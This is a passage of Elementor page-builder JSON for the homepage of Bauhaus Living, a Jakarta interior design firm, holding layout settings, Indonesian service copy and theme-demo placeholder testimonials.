"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\